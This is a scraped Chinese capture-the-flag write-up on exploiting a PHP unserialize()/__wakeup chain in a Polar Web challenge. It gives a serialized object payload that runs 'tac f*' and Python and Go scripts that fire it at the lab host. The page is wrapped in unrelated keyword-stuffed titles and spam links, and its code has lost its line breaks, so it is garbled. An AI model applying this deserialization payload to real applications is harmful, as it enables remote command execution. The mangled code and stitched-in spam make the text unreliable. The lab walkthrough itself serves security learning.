当前位置: 首页 > news >正文

做提升自己的网站今天最新新闻

做提升自己的网站,今天最新新闻,python 做网站合适吗,什么网站值得做Polar Web【简单】PHP反序列化初试 Contents Polar Web【简单】PHP反序列化初试思路EXP手动脚本PythonGo 运行&总结 思路 启动环境,显示下图中的PHP代码,于是展开分析: 首先发现Easy类中有魔术函数 __wakeup() ,实现的是对成员…

Polar Web【简单】PHP反序列化初试

Contents

  • Polar Web【简单】PHP反序列化初试
    • 思路
    • EXP
      • 手动
      • 脚本
        • Python
        • Go
    • 运行&总结

思路

启动环境,显示下图中的PHP代码,于是展开分析:

  1. 首先发现Easy类中有魔术函数 __wakeup() ,实现的是对成员变量 $name 的回显。
  2. 观察下方发现, unserialize() 函数将触发该魔术函数的执行,因此考虑构造序列字符串传入该类的成员变量 $name 中,以触发命令执行。
  • 本题分别使用手动注入和脚本运行两种方式进行解答。

code

EXP

手动

manual
flag

脚本

Python
import requestsdef attack(url, payload):url += payloadres = (requests.get(url).content.decode('utf8'))if res:print(res[res.rindex('flag'):res.rindex('"')])if __name__ == '__main__':site = 'http://~.www.polarctf.com:8090/'pl = '?easy=O:4:"Easy":1:{s:4:"name";O:4:"Evil":2:{s:4:"evil";s:6:"tac f*";s:3:"env";N;}}'attack(site, pl)
Go
package mainimport ("fmt""io/ioutil""net/http""net/url""strings"
)func attack(url string) {//fmt.Println("url:", url)if resp, err := http.Get(url); err != nil {panic("GET ERR: " + err.Error())} else {out, _ := ioutil.ReadAll(resp.Body)ans := string(out)fmt.Println(ans[strings.LastIndex(ans, "flag"): strings.LastIndex(ans, "\"")])}
}func main() {baseURL := "http://~.www.polarctf.com:8090/"// 解析基础 URLu, err := url.Parse(baseURL)if err != nil {panic(err)}// 解析查询字符串q, err := url.ParseQuery(u.RawQuery)if err != nil {panic(err)}// 添加或更新查询参数q.Set("easy", "O:4:\"Easy\":1:{s:4:\"name\";O:4:\"Evil\":2:{s:4:\"evil\";s:6:\"tac f*\";s:3:\"env\";N;}}")// 编码查询字符串u.RawQuery = q.Encode()attack(u.String())
}
  • !注意 !在Go语言中,为了防止特殊的字符导致URL被截断引发HTTP请求异常,需要对原生URL进行编码处理

运行&总结

run

  • 本题考查PHP代码分析、反序列化以及序列构造的技巧
  • 需要对PHP面向对象设计有所认识






敬,不完美的明天
http://www.khdw.cn/news/13628.html

相关文章:

  • 韩都衣舍网站建设策划书百度seo关键词排名 s
  • wordpress 仿站思路郴州网站推广
  • jsp网站开发详细教程网站排名推广工具
  • 红黑网站模板国内免费ip地址
  • 苏州网站优化企业google服务框架
  • 网站运营岗位介绍seo关键词优化服务
  • 河北省建设厅网站电话浏览器老是出现站长工具
  • 怎么用axure做h5网站用html制作淘宝网页
  • 智能建站推荐bittorrentkitty磁力猫
  • 人大网站信息宣传建设google seo优化
  • 关于做网站的总结今日刚刚发生的新闻
  • 北京建网站服务销售管理
  • 方一凡和磊儿做家教的网站宁波网站建设方案推广
  • 宝鸡精品网站开发外贸找客户有什么网站
  • 做盗版小说网站成功的网络营销案例
  • 有免费做门户网站吗站内推广和站外推广的区别
  • 做网站浏览器必须用xp系统吗网络推广长沙网络推广
  • 工程建设其他费用包括哪些河北seo
  • 鸿蒙最新版本系统优化工具
  • 苹果cms做的影视网站网站权重是什么意思
  • 泗洪做网站公司如何做好一个品牌推广
  • 谁教我做啊谁会做网站啊写软文怎么接单子
  • 学做网站有前途吗深圳百度地图
  • 水利工程建设信息网站百度app浏览器下载
  • 网站首页图片切换代码站长统计app软件下载官网安卓
  • 专业建设网站站长之家查询域名
  • 东莞新感染一例阳性seo刷排名公司
  • 发改委政务网站建设网络推广引流
  • 可以做长页的网站平台推广是做什么的
  • 一站式营销推广网络营销案例范文